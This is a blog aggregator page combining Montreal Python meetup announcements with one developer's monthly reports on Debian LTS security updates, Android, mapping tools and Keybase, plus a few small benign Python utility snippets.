External Blogs

Montréal-Python 58: Dramatics Chartreuse

Montreal Python - Tue, 05/03/2016 - 23:00

We're about a month away from the next PyCon conference in Portland, Oregon, and we are organizing our 58th meetup at our lovely UQAM. Join us if you would like to see what the Python community in Montreal is up to.

As usual, we are welcoming guests presenting in both languages, and they will show you their projects and achievements.

Don't forget to join us after the meetup at the Benelux to celebrate spring in our lovely city.

Flash presentations

Kate Arthur: Kids CODE Jeunesse

Kids Code Jeunesse is dedicated to giving every Canadian child the chance to learn to code and to learn computational thinking. We introduce educators, parents and communities to intuitive teaching tools. We work in classrooms and community centres, host events, and give workshops to support engaging educational experiences for everyone.

Christophe Reverd: Club Framboise (http://clubframboise.ca/)

A presentation of Club Framboise, the community of Raspberry Pi users in Montreal.

Main presentations

Vadim Gubergrits: DIY Quantum Computer

An introduction to Quantum Computing with Python.

Pascal Priori: santropol-feast: Savoir-faire Linux and volunteers support the Santropol Roulant (https://github.com/savoirfairelinux/santropol-feast)

As part of the Maison du logiciel libre, Savoir-faire Linux and volunteers are supporting the Santropol Roulant, a Montreal community organization, in building a Django-based platform to manage its client database. At the heart of Santropol Roulant's activities is its meals-on-wheels service, which cooks, prepares and delivers more than a hundred hot meals every day to people losing their autonomy. The client database plays a key role in that chain of services. Built with Django, the project is looking for volunteers who want to get involved and contribute to the continued development of the platform!

George Peristerakis: How CI is done in Openstack

In George's last talk, there were a lot of questions about the details of integrating code review and continuous integration in OpenStack. This talk is a follow-up on the process and the technology behind implementing CI for OpenStack.

Where

UQÀM, Pavillon PK

201 Président-Kennedy Avenue

Room PK-1140

When

Monday, May 9th 2016

Schedule
  • 6:00pm — Doors open
  • 6:30pm — Presentations start
  • 7:30pm — Break
  • 7:45pm — Second round of presentations
  • 9:00pm — End of the meeting, have a drink with us
We’d like to thank our sponsors for their continued support:
  • UQÀM
  • Bénélux
  • w.illi.am/
  • Outbox
  • Savoir-faire Linux
  • Caravan
  • iWeb

My free software activities, April 2016

Anarcat - Mon, 04/25/2016 - 13:23
Debian Long Term Support (LTS)

This is my 5th month working on Debian LTS, started by Raphael Hertzog at Freexian. This is my largest month so far: I worked on completing the Xen and NSS package updates from last month, but also spent a significant amount of time on phpMyAdmin and libidn.

Updates to NSS and Xen completed

This basically consisted of following up on reviews from other security people. I continued building on Brian's work and tested the package on a test server at Koumbit, which seems to have survived the upgrade well. The details are in this post to the debian-lts mailing list.

As for NSS, the package was mostly complete, but I had forgotten to ship the tests for some reason, so I added them back. I also wrote to the release team to see if it was possible to update NSS to the same version in all suites. Unfortunately, this issue is still pending, but I still hope we can find better ways of managing that package in the long term.

IDN and phpMyAdmin

Most of my time this month was spent working on IDN and phpMyAdmin. Unfortunately, it turns out that someone else had already worked on the libidn package. This is partly my fault: I forgot to check the dsa-needed.txt file for assignments before working on the package. But considering how in flux the workflow currently is, with the switch between the main security team and the LTS team for wheezy maintenance, I don't feel too bad. Still, I prepared a package, which was a bit more painful than it should have been because of GNUlib. Oddly enough, I didn't even know about GNUlib before, and after that experience, I feel that it should just not exist anymore. I have filed a bug to remove that dependency at the very least, but I do not clearly see how such a tool is necessary on Debian at this point in time.

But phpMyAdmin? No one had worked on that. And I understand why: even though it's a very popular package, there were quite a few outstanding issues (8!) in Wheezy, with 10-15 patches to be ported. Plus, it's... well, PHP. And old PHP at that, with some parts using modern autoloader classes, others mixing HTML and PHP content, require (and not require_once), and all sorts of nasty things you still find in the PHP universe. I nevertheless managed to produce a new Debian package for wheezy and test it on Koumbit's test servers. Hopefully, that can land in Wheezy soon.

Long term software support

I am a little worried that, in both Jessie and Wheezy, we are sitting in between stable releases of phpMyAdmin, a recurring issue for a lot of packages in Debian stable or LTS. Sometimes the version that happens to be in Debian testing when it is released as stable is simply not a supported release upstream. That is the case for phpMyAdmin in Jessie (4.3, whereas 4.0 and 4.4 are supported) and Wheezy (3.4, although it's unclear how long that was supported upstream). But even if the next Debian stable (Stretch) picked a stable release upstream, there is actually no phpMyAdmin release with a support window as long as Debian stable's (roughly 3 years), let alone as long as Debian LTS's (5 years).

This is a similar problem with NSS: upstream is simply not supporting their product in the long term, or at least not in the terms we are used to in the Debian community (i.e. only security fixes or regressions). This is, in my opinion, a real concern for the reliability and sustainability of the computing infrastructure we are creating. While some developers are of the opinion that software older than 18 months is too old, here we are shipping hardware and software into space, and we have Solaris, which is supported for 16 years! Now that is a serious commitment, and something we can rely on. 18 months is a really, really short time in the history of our civilization. I know computer programmers and engineers like to think of themselves in elitist terms, that they are changing the world every other year. But the truth is that things have not changed much in the four decades that computing has existed, in terms of either security or functionality. Two quotes from my little quotes collection come to mind here:

Software gets slower faster than hardware gets faster. - Wirth's law

The future is already here – it's just not very evenly distributed. - William Gibson

Because of course, the response to my claim that computing is not really advancing is "but look! we have supercomputers in our pockets now!" Yes, of course, we do have those fancy phones, and they are super-connected, but they are also a threat to our fundamental rights and freedoms. And those glittering advances always pale in comparison to what could be done if we weren't wasting our time rewriting the same software over and over again on different, often proprietary, platforms, simply because of the megalomaniac fantasies of egoistic programmers.

It would be great to build something that lasts, for a while. Software that does not need to be updated every 16 months. You'd think that something as basic as a screensaver release could survive what is basically the range of human infancy. Yet it seems we like to run mindlessly in the minefield of software development, one generation following the other without questioning the underlying assumption of infinite growth that permeates our dying civilization.

I have talked about this before, of course, but working with the LTS project unnerves me so badly that I just needed to let out another rant.

(For the record, I really have a lot of respect for JWZ and all the work he has done in the free software world. I frequently refer to his "no-bullshit" backup guide and use Xscreensaver daily. But I do think he was wrong in this case: asking Debian to remove Xscreensaver is just too much. The response from the maintainer was exemplary of how to handle such issues in the future. I restarted Xscreensaver after the stable update, the message is gone, and things are still all fine. Thanks JWZ and Tormod for keeping things rolling.)

Other free software work

With that in mind, I obviously didn't stop doing other computing work this month. In fact, I did a lot of work to try to generally fix the internet, that endless and not-quite-gratifying hobby so many of us are destroying our bodies to accomplish.

Build tools

I have experimented a bit more with different build tools. I got worried because at some point cowbuilder got orphaned, and I figured I could refresh the way I build packages for LTS. I looked into sbuild, but that ended up not bringing much improvement over my current cowbuilder setup (which I really need to document better). I was asked by the new maintainer to open a bug report to make such setups easier by guessing the basepath better, so we'll see how that goes.

I did enjoy the simplicity of gitpkg, and discovered cowpoke, which made building packages about 2 times faster because I could use another server to build larger packages. I also found that gitpkg doesn't use -n by default when calling gzip, which makes it harder to reproduce tarballs that are themselves built reproducibly, as GitHub tarballs are (really nice of them). So I filed bug #820842 about that.
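
To illustrate why that -n flag matters, here is a minimal sketch using Python's gzip module, whose mtime parameter plays the same role; the data is made up:

    import gzip
    import io

    def compress(data, mtime=None):
        # gzip embeds a timestamp in its header; mtime=None means "now",
        # which makes two otherwise identical archives differ
        buf = io.BytesIO()
        with gzip.GzipFile(fileobj=buf, mode="wb", mtime=mtime) as f:
            f.write(data)
        return buf.getvalue()

    data = b"some tarball content"
    # with the timestamp zeroed out (the equivalent of gzip -n), the
    # output depends only on the input, so it is reproducible:
    assert compress(data, mtime=0) == compress(data, mtime=0)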

It would be pretty awesome if such buildds were available for Debian Developers to do their daily tasks. It could simply be a machine that would spin up a chroot with cowbuilder, or it could even be a full, temporary VM, although that would take way more resources than a simple chroot with a cowbuilder setup.

In the meantime, I should probably look at whalebuilder as an alternative to cowbuilder. It is a tool that supports building packages within a Docker container, which means that packages are built in a clean environment like with pbuilder, using COW optimisations, but also without privileges or network access, which is a huge plus, especially when you build untrusted packages.

Ikiwiki admonitions

I have done some work to implement MoinMoin-like admonitions in Ikiwiki, something I am quite happy about, since it's a feature I was really missing from MoinMoin. Admonitions are a really nice way to outline certain blocks with varying severity levels and distinct styles. For example:

Admonitions are great!

This was done with a macro, but basically, since Markdown allows more or less arbitrary HTML, it can also be done with the <div> tag. I like that we don't have a new weird markup here. Yet I still liked the sub-parser feature of MoinMoin, something that can be implemented in Ikiwiki too, but it's a little more clunky. Normally, you'd probably do this with the inline macro and subpages, but it's certainly less intuitive than directly inlined content.

Ereader

I got a new e-reader! I was hesitating between the Kobo Aura H2O and the Kobo Glo HD, which were the ones available at Best Buy. So I bought both and figured I would return one of them. That was a painful decision! In the end, both machines are pretty nice:

  • Aura H2O
    • Pros:
      • waterproof
      • larger screen (makes it easier to see web pages and better for the eyes)
      • naturally drawn to it
    • Cons:
      • heavier
      • larger (fits in outside pocket though)
      • port cover finicky
      • more expensive ($180) - prices may go down in the future
  • Aura Glo HD
    • Pros
      • smaller (fits in the inside pocket of both my coats)
      • better resolution in theory (can't notice in practice)
      • cheaper ($100)
      • may be less common in the future (larger models more common? just a guess)
    • Cons
      • no SD card
      • smaller screen
      • power button in the middle

... but in the end, I settled on the Glo, mostly for the price. Heck, I saved around $100; for that amount, I could have gotten two machines, so that if one broke I would still have the other. I ordered a cover for it from Deal Extreme about two weeks ago, and it still hasn't arrived. I suspect it's going to take a few more months to get here, by which point I may have changed e-readers again.

Note that both e-readers needed an update to Calibre, so I started working on a Calibre backport (#818309), which I will complete soon.

So anyways, I looked into better ways of transferring articles from the web to the e-reader, something which I do quite a bit to avoid spending too much time on the computer. Since the bookmark manager I use (Bookie) is pretty much dead, I started looking at other alternatives. And partly inspired by Framasoft's choice of Wallabag for their bookmarking service (Framabag), I started to look into that software, especially since my friend who currently runs the Bookie instance is thinking of switching to Wallabag as well.

It seems the simplest way to browse articles remotely through a standard protocol is by implementing OPDS support in Wallabag. OPDS is a standard developed in part by the Internet Archive, and it allows for browsing book collections and downloading them. Articles and bookmarks would then be presented as individual books accessible from any OPDS-compatible device.
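
For a rough idea of what that would look like: OPDS 1.x is essentially an Atom feed whose entries carry download links with a special "acquisition" relation. A minimal sketch, with made-up article data (this is not Wallabag's actual code):

    from xml.etree import ElementTree as ET

    ATOM = "http://www.w3.org/2005/Atom"
    ACQUISITION = "http://opds-spec.org/acquisition"
    ET.register_namespace("", ATOM)

    def opds_feed(articles):
        # an OPDS acquisition feed is an Atom feed whose entries carry
        # download links marked with the OPDS "acquisition" relation
        feed = ET.Element("{%s}feed" % ATOM)
        ET.SubElement(feed, "{%s}title" % ATOM).text = "Saved articles"
        for article in articles:
            entry = ET.SubElement(feed, "{%s}entry" % ATOM)
            ET.SubElement(entry, "{%s}title" % ATOM).text = article["title"]
            link = ET.SubElement(entry, "{%s}link" % ATOM)
            link.set("rel", ACQUISITION)
            link.set("type", "application/epub+zip")
            link.set("href", article["href"])
        return ET.tostring(feed, encoding="unicode")

    print(opds_feed([{"title": "An article", "href": "/article/1.epub"}]))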

Unfortunately, the Kobo e-readers don't support OPDS out of the box: you need to set up an OPDS-compatible reader like Koreader. And that I found nearly impossible to do: I was able to set up KSM (the "start menu", not to be confused with that KSM), but not Koreader within KSM. Besides, I do not want a separate OS running on the device: I just want to start Koreader every once in a while. KSM just starts another system when you reboot the e-reader, which is not really convenient on the Kobo.

Basically, I just want to add Koreader as a tile on the e-reader's home screen. I found the documentation on that topic to be sparse and hard to follow: it is often dispersed across multiple forum threads, and involves uploading random, often proprietary, binaries to the e-reader. It had been a long time since I was asked to "register my software" frenetically, and I hadn't missed that one bit. So I decided to stay away from this until that solution and its documentation mature a bit.

Streaming re-established

I have worked a bit on my home radio stream. I simply turned the Liquidsoap stream back on and made a few tweaks to the documentation that I had built back then. All that experimenting led me to do two NMUs. One was for gmpc-plugins, to fix a FTBFS (bug #807735) and to properly kill the shout streamer when playback completes (bug #820908).

The other was to fix the ezstream manpage (bug #573928), a patch that had been sitting there for 5 years! This came out of trying to find an easy way to stream random audio (say, from a microphone) to the Icecast server, something which is surprisingly difficult considering how basic that functionality is. I was surprised to see that Darkice just completely fails to start (bug #821040), and I had to fall back to the simpler ices2 to stream the audio.

I am still having issues with Liquidsoap: it's really unstable! As a server, I would expect it to keep running for days, if not years. Unfortunately, there's always something that makes it crash. I hit an assertion failure (bug #821112), and I keep seeing it crash after 2-3 days fairly reliably, a bug I reported 3 years ago that is still not fixed (bug #727307).

Switching the stream back to Vorbis (because I was having problems with the commandline MP3 players, and ogg123 is much more lightweight) created another set of problems, this time with the phone. It seems that Android cannot stream Vorbis at all, something that is even worse in Cyanogenmod... I also had to tweak my MPD config to make the Android client able to load the larger playlists (see "dmix buffer is full").

Android apps

So I have also done quite a bit of work on my phone again. I finally was told how to access Termux from adb shell, which is pretty cool, because now I can start a screen session on my phone and then, when I'm tired of tapping to type, just reconnect to it when I plug a USB cable into my laptop. I sent a pull request to fix the documentation regarding that.

I also tried to see how my SMS and Signal situation could be improved. Right now, I have two different apps to do SMS on my phone: I use both Signal and the VoIP.ms SMS client, because I do not have a contract or SIM card in my phone. Both work well independently, but it's somewhat annoying to have to switch between the two.

(In fact, I feel that Signal itself has an issue with how it depends on the network to send encrypted messages: I often have to "ping" people in clear text (and therefore in the other app) so that they connect to their data plan to fetch my "secure" Signal messages...)

Anyways, I figured it would be nice if there were at least an SMS fallback in Signal that would allow me to send regular text messages from Signal through VoIP.ms. That was dismissed really fast. Moxie even closed the conversation completely, something I had never experienced before and which doesn't feel exactly pleasant. The VoIP.ms side was of course not impressed, and basically shrugged it off because Signal was not receptive.

I also tried to clear up the Libresignal confusion: there are 3 different projects named "Libresignal", and I am not sure I figured out the right one, even though the issue is now closed and there's a FAQ that is supposed to make all that clear. Nevertheless, I opened two distinct feature requests to try to steer the conversation in a more productive direction: GCM-less calls and GCM support. But I'm not sure either will go anywhere.

In the meantime, I am using the official Signal client, which I downloaded using gplaycli and which I keep up to date with Aptoide. Even though the reliability of that site is definitely questionable, it seems that once you have a trusted version, it is safe to upgrade regardless of the source, because the APK signature provides a trust path between you and the developer.

I also filed a few issues, with varying levels of success and response from the community.

Random background radiation

And then there's of course the monthly background noise of all the projects I happened to not only stumble upon, but also file bugs or patches against.


Call for speakers: Montréal-Python 58: Dramatics Chartreuse

Montreal Python - Sun, 04/17/2016 - 23:00

Spring has arrived, and Montreal Python is just getting started again. We are holding our next event on Monday, May 9th, and it is a great chance to catch up and get out of your winter hibernation. It is also an opportunity to come present, because we are looking for speakers for talks of 30, 15 or 5 minutes.

For example, if you are using Python to deploy Docker services, doing Big Data, or simply having fun discovering new tricks that make your life easier, we want you on stage :)

We are also looking for people interested in presenting a module of the month, or a module that you love!

To submit your talk, write us at mtlpyteam@googlegroups.com

Where

More information coming soon

When

Monday, May 9th 2016

We’d like to thank our sponsors for their continued support:

  • UQÀM
  • Bénélux
  • w.illi.am/
  • Outbox
  • Savoir-faire Linux

MTL NewTech Startup Demos & Networking + PyCon Contest

Montreal Python - Mon, 04/11/2016 - 23:00

PyCon is partnering again with MTL NewTech and Montréal-Python this year to bring one lucky Montreal startup to PyCon in Portland, Oregon, to present alongside Google, Facebook, Stripe, Heroku, Microsoft, Mozilla and many other technology companies.

If you are a startup that meets the requirements below, apply now by filling out this form: http://goo.gl/forms/zf9jO8n8vR with the following information: a) the size of the team, b) the age of the startup, and c) your use of Python.

  • Deadline for applications: May 5th, 23h59
  • Announcement of the selected startups: starting on May 5th
  • MTL NewTech demo & announcement of the winner: May 10th

Feel free to invite fellow startups!

For more details about PyCon and the startup row in general, please head to the PyCon website at https://us.pycon.org/2016/events/startup_row/


==============
Eligible companies must meet the following criteria:

  • Fewer than 15 employees, including founders

  • Less than two years old

  • Use Python somewhere in your startup: backend, front-end, testing, wherever

  • If selected, please confirm that you will staff your booth in the Expo Hall on your appointed day. We will try to accommodate your preferences: Monday or Tuesday

  • No repeats. If you were on startup row in a previous year, please give another startup a chance this year.

==============


My free software activities, March 2016

Anarcat - Thu, 03/31/2016 - 18:32
Debian Long Term Support (LTS)

This is my 4th month working on Debian LTS, started by Raphael Hertzog at Freexian. I spent half of the month away on vacation, so little work was done, especially since I tried to tackle rather large uploads like NSS and Xen. I also worked the frontdesk shift last week.

Frontdesk

That work mainly consisted of figuring out how to best help the security team with the last uploads to the Wheezy release. For those who don't know, Debian 7 Wheezy, or "oldstable", will be unsupported by the security team starting at the end of April, and Debian 6 Squeeze (the previous LTS) is now unsupported. The PGP signatures on the archived release have started yielding expiration errors, which can be ignored, but which are a strong reminder that it is really time to upgrade.

So the LTS team is now working on porting a few security fixes from squeeze to wheezy, and this is what I focused on during triage work. I have identified the following high-priority packages, which I will work on after I complete my work on the Xen and NSS packages (detailed below):

  • libidn
  • icu
  • phpmyadmin
  • tomcat6
  • optipng
  • srtp
  • dhcpcd
  • python-tornado
Updates to NSS and Xen

I have spent a lot of time testing and building packages for NSS and Xen. To be fair, Brian May did most of the work on the Xen packages; I merely did some work to test them on Koumbit's infrastructure, something I will continue doing next month.

For NSS, wheezy and jessie are in this weird state where patches were provided to the security team all the way back in November yet were never tested. Since then, yet more issues came up and I worked hard to review and port patches for those new security issues to wheezy.

I'll follow up on both packages next month.

Other free software work

Android

TL;DR: there's an even longer version of this, with step-by-step procedures, that I will keep updating in my wiki.

I somehow inherited an Android phone recently, on loan from a friend, because the phone broke one too many times and she got a new one from her provider. This phone is an HTC One S "Ville", which is fairly old, but good enough to play with and give me a mobile computing platform to listen to podcasts, play music, access maps and create GPS traces.

I was previously doing this with my N900, but that device is really showing its age: very little development is happening on it, the SDK is closed source, and the device itself is fairly big compared to the Ville. Plus, the SIM card actually works in the Ville, so even though I do not have an actual contract with a cell phone provider (too expensive, too invasive of my privacy), I can still make emergency (911) phone calls!

Plus, since there is good wifi on the machine, I can use it to connect to the phone system with the built-in SIP client, and send text messages through SMS (thanks to VoIP.ms SMS support) or Jabber. I have also played around with LibreSignal, the free software replacement for the Signal client, which uses proprietary Google services. Yes, the VoIP.ms SMS app also uses GCM, but hopefully that can be fixed. (While I was writing this, another Debian Developer wrote a good review of Signal, so I am happy to skip that step. Go read that.)

See also my apps list for a more complete list of the apps I have installed on the phone. I welcome recommendations on cool free software apps I should use!

I have replaced the stock firmware on the phone with Cyanogenmod 12.1, which was a fairly painful experience, partly because of the difficult ambiance on the #cyanogenmod channel on Freenode, where I had extreme experiences: a brave soul helped me through the first flashing process for around 2 hours, nicely holding my hand at every step. Other times, I saw flames and obtuse comments from users who were vulgar, brutal and obnoxious, if not downright homophobic and sexist. It is clearly a community that needs to fix its attitude.

I have documented everything I could in detail in this wiki page, in case others want to resuscitate their old phones, but also because I ended up reinstalling the freaking phone about 4 times and was getting tired of forgetting how to do it every time.

I am somewhat fascinated by Android: here is the Linux-based device that should save us all from the proprietary Apple nightmare of fenced-in gardens and censorship. Yet public Android downloads are hidden behind license agreements, even though the code itself is free, which has led fellow Debian developers to work on libre rebuilds of Android to work around this insanity. But worse: all phones are basically proprietary devices down to the core. You need custom firmware loaded on the machine for it to boot at all, from the bootloader all the way down to the GSM baseband and wifi drivers. It is a minefield of closed source software, and trying to run free software on there is a bit of a delusion, especially since the baseband has so much power over the phone.

Still, I think it is really interesting to run free software on those machines and help people who are stuck with cell phones get familiar with software freedom. It seems especially important to me to make Android developers aware of software freedom, considering how many apps are available for free yet cannot meaningfully be contributed to, because the source code is not published at all, or the app is published only on the Google Store instead of the more open and public F-Droid repository, which publishes only free software.

So I did contribute. This month, I am happy to report contributions to a number of free software projects on Android.

I have also reviewed the literature surrounding Telegram, a popular messaging app and rival to Signal and Whatsapp. Oddly enough, my contributions to Wikipedia on that subject were promptly reverted, which made me bring up the subject on the article's Talk page. This led to an interesting response from the article's main editors, which at least resulted in the article noting that "its security features have been contested by security researchers and cryptography experts".

Considering the history of Telegram, I would keep people away from it and direct them to use Signal instead, even though Signal has similar metadata issues, mostly because of Telegram's lack of response to the security issues outlined by fellow security researchers. Both systems suffer from a lack of federation as well, which is a shame in this era of increasing centralization.

I am not sure I will put much more work in developing for Android for now. It seems like a fairly hostile platform to work on, and unless I have specific pain points I want to fix, it feels so much better to work on my own stuff in Debian.

Which brings me to my usual plethora of free software projects I got stuck in this month.

IRC projects

irssi-plugin-otr had a bunch of idiotic bugs lying around, and I had a patch in the Debian package that I hadn't submitted upstream; the package needed a rebuild because the irssi version changed, which is a major annoyance. The version in sid is now a snapshot, because upstream needs to make a new release, but at least it should fix things for my friends running unstable and testing. Hopefully those silly uploads won't be necessary in the future.

That's for the client side. On the server side, I have worked on updating the Atheme-services package to the latest version, which actually failed because the upstream libmowgli is missing release tags, which means the Debian package for it is not up to date either. Still, it is nice to have a somewhat newer version, even though it is not the latest, and some bugs were fixed.

I have also looked at making atheme reproducible, but was surprised at the hostility of upstream. In the end, it looks like they are still interested in patches, but those will be a little harder to deploy than for Charybdis, so this could take some time. Hopefully I will find time in the coming weeks to test the new atheme services daemon on the IRC network I operate.

Syncthing

I have also re-discovered Syncthing, a file synchronization software. Amazingly, I was having trouble transferring a single file between two phones. I couldn't use Bluetooth (not sure why), the "Wifi sharing" app was available on only one phone (and is proprietary, and has a 4MB file limit), and everything else requires an account, the cloud, or cabling.

So: just head to F-Droid, install Syncthing, flash a few QR codes around, and voilà: files are copied over! Pretty amazing: the files were actually copied over the local network, using IPv6 link-local addresses, encryption and the DHT. Which is a real geeky way of saying it's completely fast and secure.

Now, I did find a few usability issues, so much so that I wrote a whole usability story for the developers, who were really appreciative of my review. Some of the issues were already fixed, others were pretty minor. Syncthing has a great community, and it seems like a great project I encourage everyone to get familiar with.

Battery stats

The battery-status project I mentioned previously has been merged with the battery-stats project (yes, the names are almost the same, which is confusing), so I had to do some work to fix my Python graph script, which was accepted upstream and will officially be part of Debian from now on, which is cool. The previous package was unofficial. I have also noticed that my battery has significantly less capacity than when I wrote the script. Whereas it was basically full back then, it seems it has now lost almost 15% of its capacity in about 6 months. According to the script's calculations:

this battery will reach end of life (5%) in 935 days, 19:07:58.336480, on 2018-10-23 12:06:07.270290

Which is, to be fair, a good life: it will keep working, more or less, for about three more years.
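
For the curious, the projection amounts to a simple linear extrapolation over logged capacity samples. A minimal sketch of the idea, with made-up numbers (the real script reads the battery-stats logs):

    from datetime import datetime, timedelta

    # (timestamp, capacity as a percentage of design capacity) - made up
    first = (datetime(2015, 10, 1), 98.0)
    last = (datetime(2016, 4, 1), 83.0)

    # slope of the capacity curve, in percent per second (negative)
    rate = (last[1] - first[1]) / (last[0] - first[0]).total_seconds()
    threshold = 5.0  # the "end of life" level
    seconds_left = (threshold - last[1]) / rate
    print("end of life (%g%%) in %s, on %s" % (
        threshold, timedelta(seconds=seconds_left),
        last[0] + timedelta(seconds=seconds_left)))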

Playlist, git-annex and MPD in Python

On top of my previously mentioned photos-import script, I have worked on two more small programs. One is called get-playlist, and is an extension to git-annex that easily copies into the local git-annex repository all files present in a given M3U playlist, as the sketch below shows. This is useful for me because my phone cannot possibly fit my whole MP3 collection, and I use playlists in GMPC to tag certain files, particularly the Favorites list, which is populated by the "star" button in the UI.
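
The core idea is tiny. A minimal sketch, assuming the playlist lists paths relative to the repository (the real script surely handles more cases):

    import subprocess
    import sys

    def get_playlist(m3u_path, repo="."):
        # an M3U playlist is one file path per line, with optional
        # "#EXTM3U"-style comment lines to skip
        with open(m3u_path) as playlist:
            files = [line.strip() for line in playlist
                     if line.strip() and not line.startswith("#")]
        # ask git-annex to fetch the actual content of those files
        subprocess.check_call(["git", "annex", "get"] + files, cwd=repo)

    if __name__ == "__main__":
        get_playlist(sys.argv[1])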

I had a lot of fun writing this script. I started using elpy as an IDE in Emacs. (Notice how Emacs got a new webpage, a huge improvement over what had been basically unchanged since the original version, now almost 20 years old and probably written by RMS himself.) I wonder how I managed to stay away from Elpy for so long, as it glues together key components of Emacs in an elegant and functional bundle:

  • Company: the "vim-like" completion mode I had been waiting for forever
  • Jedi: context-sensitive autocompletion for Python
  • Flymake: to outline style and syntax errors (unfortunately not the more modern Flycheck)
  • inline documentation...

In short, it's amazing, and it makes everything so much easier to work with that I wrote yet another script. The first program wouldn't work very well because some songs in the playlists had been moved, so I made another program, this time to repair playlists that refer to missing files. The script is simply called fix-playlists, and it can operate transparently on multiple playlists. It has a bunch of heuristics to find files, and it uses an MPD server as a directory to search in. It can edit files in place or just act as a filter.
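
A minimal sketch of the filter mode, assuming the python-mpd client library and a simple basename-matching heuristic (the real script does more than this):

    import os
    import sys

    from mpd import MPDClient  # python-mpd, as packaged in Debian

    client = MPDClient()
    client.connect("localhost", 6600)

    # index everything MPD knows about by file name
    index = {}
    for item in client.listall():
        if "file" in item:
            index[os.path.basename(item["file"])] = item["file"]

    # filter mode: read a playlist on stdin, write a repaired one on stdout
    for line in sys.stdin:
        entry = line.strip()
        if not entry or entry.startswith("#"):
            sys.stdout.write(line)
        else:
            # heuristic: look the file name up in MPD's database
            sys.stdout.write(index.get(os.path.basename(entry), entry) + "\n")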

Useful snippets

Writing so many scripts so often, I figured I needed to stop wasting time writing the same boilerplate on top of every file, so I started publishing Yasnippet-compatible file snippets in my snippets repository. For example, this report is based on the humble lts snippet. I also have a base license snippet which slaps the AGPLv3 license on top of a Python file.

But the most interesting snippet, for me, is this simple script snippet, which is basic scaffolding for a commandline script that includes argument processing, logging and filtering of files, something I was always copy-pasting around.
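
Here is roughly what such a scaffold expands to; the names below are placeholders, not the actual contents of the snippet:

    import argparse
    import logging

    def parse_args():
        parser = argparse.ArgumentParser(description="do something to files")
        parser.add_argument("files", nargs="*", help="files to process")
        parser.add_argument("-v", "--verbose", action="store_true",
                            help="show debugging information")
        return parser.parse_args()

    def main():
        args = parse_args()
        logging.basicConfig(
            level=logging.DEBUG if args.verbose else logging.INFO,
            format="%(levelname)s: %(message)s")
        for path in args.files:
            logging.info("processing %s", path)
            # actual work goes here

    if __name__ == "__main__":
        main()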

Other projects

And finally, a miscellaneous list of interesting issues:

  • there's a new Bootstrap 4 theme for Ikiwiki. It was delivering content over CDNs, which is bad for privacy, so I filed an issue, which was almost immediately fixed by the author!
  • I found out about BitHub, a tool to make payments with Bitcoins for patches submitted on OWS projects. It wasn't clear to me where to find the demo, but when I did, I quickly filed a PR to fix the documentation. Given the number of open PRs there and the lack of activity, I wonder if the model is working at all...
  • a fellow Debian Developer shared his photos workflow, which was interesting to me because I have my own peculiar script, which I had never mentioned here, but which I ended up sharing with the author

State of Mapping on the Debian Desktop

Anarcat - Sun, 03/13/2016 - 11:19

TL;DR: Mapbox Studio classic is not as good as Tilemill; Mapbox Studio is very promising, but you still need to sign up for access; and kosmtik seems to be working right now. Use kosmtik and help get it into Debian.

The requirement

I have been following the development of fascinating tools from the Development Seed people, now seemingly all focused on the Mapbox brand. They created what seemed to me a revolutionary desktop tool called Tilemill. Tilemill allowed you to create custom map stylesheets on your desktop, to outline specific areas, patterns or "things". My interest was in creating outdoor maps - OSM has pretty good biking maps, but no generic outdoor tiles out there (I need stuff for skiing, canoeing, biking)...

Mapbox has Mapbox Outdoors, but that's a paid plan as well. Oh, and there's a place to download Garmin data files especially made for the outdoors, which could be loaded in Qmapshack, but they don't have coverage in Canada at all. Besides, I would like to print maps; I know, crazy...

So I have been looking forward to seeing Tilemill packaged in Debian, given how annoying it is to maintain Node apps (period). Unfortunately, by the time Debian people figured out all the Node dependencies, the Tilemill project had stopped, and it has been stalled since 2012. It seems the Mapbox people have since been working on other products, and in the meantime the community, scratching their heads, just switched to other projects.

Overview of alternatives

I wrote this long post to the Debian bug tracker to try to untangle all of this, but figured it would be interesting to a wider community than the narrow group of people working on JavaScript packages, so I am sending it to Debian Planet as well.

So here's a summary of what has happened since Tilemill development stopped. Hang on to your tiles, boys and girls, there's a lot going on!

Mapbox Studio classic

The Mapbox people released a new product in September 2014 named Mapbox Studio classic. The code is still freely available and seems to be a fork of Tilemill. Mapbox Studio classic still has releases on GitHub, the last one from November 2015. It looks like Mapbox Studio classic has some sort of Mapbox.com lock-in, and there are certainly new copyright issues, if only with the bundled fonts, but it could probably be packaged after addressing those issues.

There is an ITP for Mapbox Studio classic as well.

Mapbox Studio

Then there's Mapbox Studio, which is a full rewrite of Mapbox Studio classic. You need to "sign up" somehow to get access, even though parts of the code are free, namely the Mapbox GL studio project. It is an interesting project because it aims to make all this stuff happen in a web browser, which means it "should" work everywhere. Unfortunately for us, it means it doesn't work anywhere without a signup form, so that's out, for me at least.

There is an ITP for Mapbox-studio as well, yet it is unclear to me what that one means, because the source code to Mapbox-studio doesn't seem to be available as far as I can tell (and the ITP doesn't say either).

That is actually the ITP for Mapbox studio classic.

Kosmtik

The Openstreetmap-carto developers have mostly switched to kosmtik instead of Mapbox. Kosmtik is another Node desktop app that seems fairly lightweight and mostly based on plugins. Ross has an ITP for kosmtik. The package is waiting on other node dependencies to be uploaded (yes, again).

The future of Tilemill

And there's still this RFP for Tilemill, which should probably be closed now because the project seems dead and plenty of alternatives exist. I wonder if some Node dependencies that were packaged for Tilemill now need to be removed from Debian, because they have become useless leaf packages... I am leaving the Tilemill RFP open for someone to clean that up.

CartoCSS

Oh, and finally, one could mention another Mapbox project: Carto, a commandline CSS tool that implements some sort of standard CSS language that all those tools end up using to talk to Mapnik, more or less. There is no RFP for that one.


Trying out Keybase

Anarcat - Thu, 03/10/2016 - 14:37

I was privileged enough to get access to the alpha preview of Keybase.io. Last year, the project raised $11M in venture capital, and they seem to be attacking the hard problems, so it is a serious project, worth considering for any cryptography hacker like me. This was obviously discussed elsewhere previously, but since Keybase has evolved a bit since then, I figured it would be worth adding my grain of salt.

The elite alpha problem

My first problem with Keybase was of course that I wasn't in the elite club of invited people. Somehow I finally got in, but the problem remains for everyone else.

In my case, it was the Keybase filesystem announcement that brought my attention back to the project, although I have yet to test that itself - yet another invite-only problem (you need to email chris@keybase.io to get access, I guess). Still, 10GB of storage might be interesting for some people, but considering the number of hurdles, or "friction" as they say, that need to be jumped over to get access, I am not sure how much traction this will get for now.

The project has been in alpha for a while now (more than a year), with no public beta announced yet, which is way slower than similarly challenging projects with less capital. Let's Encrypt, as a comparison, was publicly announced in 2014, and by the end of 2015 the public beta was open.

Private key leakage

My second major concern is that Keybase does worrisome things to private key material. If you tell it to import your regular GPG keys, it will copy them into the keybase keyring, which is already a problem: now you have two places where you store sensitive secrets.

